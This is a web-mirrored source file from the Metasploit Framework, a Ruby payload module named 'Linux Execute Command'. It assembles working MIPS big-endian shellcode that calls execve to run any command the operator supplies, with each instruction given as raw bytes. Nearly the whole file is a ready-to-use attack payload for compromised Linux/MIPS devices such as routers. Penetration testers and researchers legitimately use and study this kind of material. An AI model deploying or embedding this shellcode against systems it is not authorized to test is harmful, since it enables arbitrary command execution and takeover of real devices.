CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/mipsbe/exec.rb
Views: 15919
1
# -*- coding: binary -*-

2


3
##

4
# This module requires Metasploit: https://metasploit.com/download

5
# Current source: https://github.com/rapid7/metasploit-framework

6
##

7


8
module MetasploitModule

9


10
  CachedSize = 52

11


12
  include Msf::Payload::Single

13


14
  def initialize(info = {})

15
    super(merge_info(info,

16
      'Name'          => 'Linux Execute Command',

17
      'Description'   => %q{

18
                A very small shellcode for executing commands.

19
                This module is sometimes helpful for testing purposes.

20
         },

21
      'Author'        =>

22
        [

23
          'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload

24
          '[email protected]'  #original payload

25
        ],

26
      'References'    =>

27
        [

28
          ['EDB', '17940']

29
        ],

30
      'License'       => MSF_LICENSE,

31
      'Platform'      => 'linux',

32
      'Arch'          => ARCH_MIPSBE,

33
      'Payload'       =>

34
        {

35
          'Offsets' => {} ,

36
          'Payload' => ''

37
        })

38
    )

39
    register_options(

40
      [

41
        OptString.new('CMD', [ true, "The command string to execute" ]),

42
      ])

43
  end

44


45
  #

46
  # Returns the command string to use for execution

47
  #

48
  def command_string

49
    return datastore['CMD'] || ''

50
  end

51


52
  def generate(_opts = {})

53


54
    shellcode =

55
      "\x24\x06\x06\x66" + #li a2,1638

56
      "\x04\xd0\xff\xff" + #bltzal a2,4100b4

57
      "\x28\x06\xff\xff" + #slti a2,zero,-1

58
      "\x27\xbd\xff\xe0" + #addiu sp,sp,-32

59
      "\x27\xe4\x10\x01" + #addiu a0,ra,4097

60
      "\x24\x84\xf0\x1f" + #addiu a0,a0,-4065

61
      "\xaf\xa4\xff\xe8" + #sw a0,-24(sp)

62
      "\xaf\xa0\xff\xec" + #sw zero,-20(sp)

63
      "\x27\xa5\xff\xe8" + #addiu a1,sp,-24

64
      "\x24\x02\x0f\xab" + #li v0,4011

65
      "\x01\x01\x01\x0c"   #syscall 0x40404

66


67
    #

68
    # Constructs the payload

69
    #

70


71
    shellcode = shellcode + command_string + "\x00"

72


73
    # we need to align our shellcode to 4 bytes

74
    while shellcode.bytesize%4 != 0

75
      shellcode = shellcode + "\x00"

76
    end

77


78
    return super + shellcode

79


80
  end

81
end

82


83